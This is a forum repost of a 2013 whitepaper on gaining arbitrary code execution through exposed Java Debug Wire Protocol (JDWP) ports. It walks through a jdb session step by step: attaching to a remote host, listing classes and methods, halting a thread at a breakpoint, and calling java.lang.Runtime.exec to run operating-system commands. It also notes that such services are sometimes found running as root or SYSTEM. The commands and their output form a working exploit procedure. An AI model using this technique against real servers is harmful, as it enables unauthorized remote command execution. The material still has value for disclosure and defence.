Nytro Posted July 26, 2013 Report Posted July 26, 2013 JDWP ExploitationAuthored by prdelkaThis is a whitepaper discussing arbitrary java code execution leveraging the Java Debugging Wire Protocol (JDWP).JDWP Arbitrary Java Code Execution Exploitation===============================================Java Debugging Wire Protocol (JDWP) is the lowlevel protocol used forcommunication between a debugger and a Java Virtual Machine (JVM) as outlined inthe Java Platform Debugger Architecture. It is often used to facilitate remotedebugging of a JVM over TCP/IP and can be identified by the initial protocolhandshake ascii string "JDWP-Handshake", sent first by the client and respondedto by the server. "jdb" is a proof-of-concept JDWP capable debugger included inOracle JDK and OpenJDK which can be used to interact with remote JDWP capableservices. Typically this service runs on TCP port 8000 however it can be foundto run on arbitrary TCP ports and is sometimes found enabled inadvertantly onservers running Java services. It is possible to use this utility to exploit remote JVM's and execute arbitrary Java code. An example shown here outlineshow to leverage this weakness to execute arbitrary host OS commands in thecontext of the JVM.$ jdb -attach x.x.x.x:8000Set uncaught java.lang.ThrowableSet deferred uncaught java.lang.ThrowableInitializing jdb ...> Information leaks can be leveraged to determine details about the remote OSplatform and Java installation configuration through the "classpath" command.> classpathbase directory: C:\Windows\system32classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]bootclasspath: [ ** MASKED ** list of JRE paths ]> jdb is capable of performing remote object creation and method invokation fromwithin the CLI using the "print" "dump" and "eval" commands with the "new"keyword. To determine the classes and methods available use the "classes" andthen "methods" on the corrosponding class. > classes...java.lang.Runtime...> methods java.lang.Runtime...java.lang.Runtime exec(java.lang.String[])...It is often necessary to set the JDB context to be within a suspended thread orbreakpoint before attempting to create a new remote object class. Using the"trace go methods" function can be used to identify a candidate for a breakpointand then "stop in your.random.class.method()" to halt the execution of a runningthread. When the execution is halted you can use "print new" to create yourclass and invoke methods such as in the following example.Breakpoint hit: "thread=threadname",your.random.class.method(), line=745 bci=0threadname[1] print new java.lang.Runtime().exec("cmd.exe /c dir")new java.lang.Runtime().exec("cmd.exe /c dir") = "java.lang.ProcessImpl@918502"threadname[1] cont> Exploitation success will be determined from the output of the JDB process asfunctions returning "null" or errors about "unsuspended thread state" wouldindicate that exploitation was unsuccessful, however in the example above we cansee that the java created a new object "java.lang.ProcessImpl@918502" indicatingthe "cmd.exe /c dir" was executed with success. On Linux this may need adjustingto "java.lang.Runtime.getRuntime().exec()" however see the method / classenumeration when attempting to exploit this flaw.Your java will be executed in the context of the running JVM application, thishas been identified on services running as both "root" (*nix) and "SYSTEM"(win32) in the wild. -- prdelkaSursa: JDWP Exploitation ? Packet Storm Quote
